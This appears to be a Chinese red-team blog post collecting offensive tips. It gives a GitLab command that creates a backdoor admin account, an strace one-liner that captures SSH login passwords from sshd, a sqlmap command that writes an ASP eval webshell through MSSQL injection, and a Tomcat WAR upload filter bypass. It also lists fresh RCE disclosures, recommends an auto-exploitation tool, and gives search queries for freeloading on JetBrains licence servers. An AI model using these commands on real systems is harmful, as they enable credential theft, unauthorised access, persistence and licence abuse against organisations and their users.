gitlab-rails runner 'user = User.new; user.email = "test@example.com"; user.name = "test"; user.username = "test"; user.password = "password"; user.access_level="admin"; user.confirmed_at = Time.zone.now; user.save!'如果是docker使用bin/rails runner
今天可谓精彩!赛博昆仑发出N个重量级漏洞,在这个特殊的日子里,未免有点太让人害怕了。
下面的几个都可以点击链接查看详情!
1.coremail RCE
目前暂未评估漏洞利用的难度有多大,影响面有多广
Coremail未授权远程代码执行.pdf
2.QQ RCE
这个据说最新版本还能打,很牛逼
QQ RCE复现 这个应该也是赛博昆仑披露的
3.域控
需要开启一些东西才可以打,自行评估影响面。
Windows域控RCE漏洞.pdf
一直以来我都觉得EHole这个工具的指纹有点老,也有点少。最近发现这个项目EHole-magic感觉瞬间来精神了,他对EHOLE这款工具增强了一些功能: * 支持Hunter* 指纹库大幅度提升 * 根据命中的指纹打对应的POC * 爆破功能 加黑的两个是我觉得最赞的功能,也是我一直以来想做的。 后续可针对本次护网爆出来的漏洞,整理高可用的POC加入其中,更快更准的打点!
1.如何窃取Linux登录的账号密码(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &) grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log2.不出网的Mssql注入(中文目录写webshell) 上传一个bat文件并执行python sqlmap.py -r aaaaaaaa.txt --batch --file-write ahell.bat -file-dest c:\users\public\music\ashell.batbat的内容为echo ^<%%eval request("aaaaaa")%%^> >D:\\张三的马赛克\\Content\\images\\logo1.asp3.Tomcat后台上传WAR包过滤该如何绕过 将文件后缀修改为xxx.w\\\ar
如果你不想使用任何的破解程序去激活你的JB家的东西,那么白嫖或许会成为你的不二之选。 在线收集版 但是很多都用不了,只能慢慢尝试 使用FOFA"Location: https://account.jetbrains.com/fls-auth?uid"使用Hunterheader="Location: https://account.jetbrains.com/fls-auth?uid"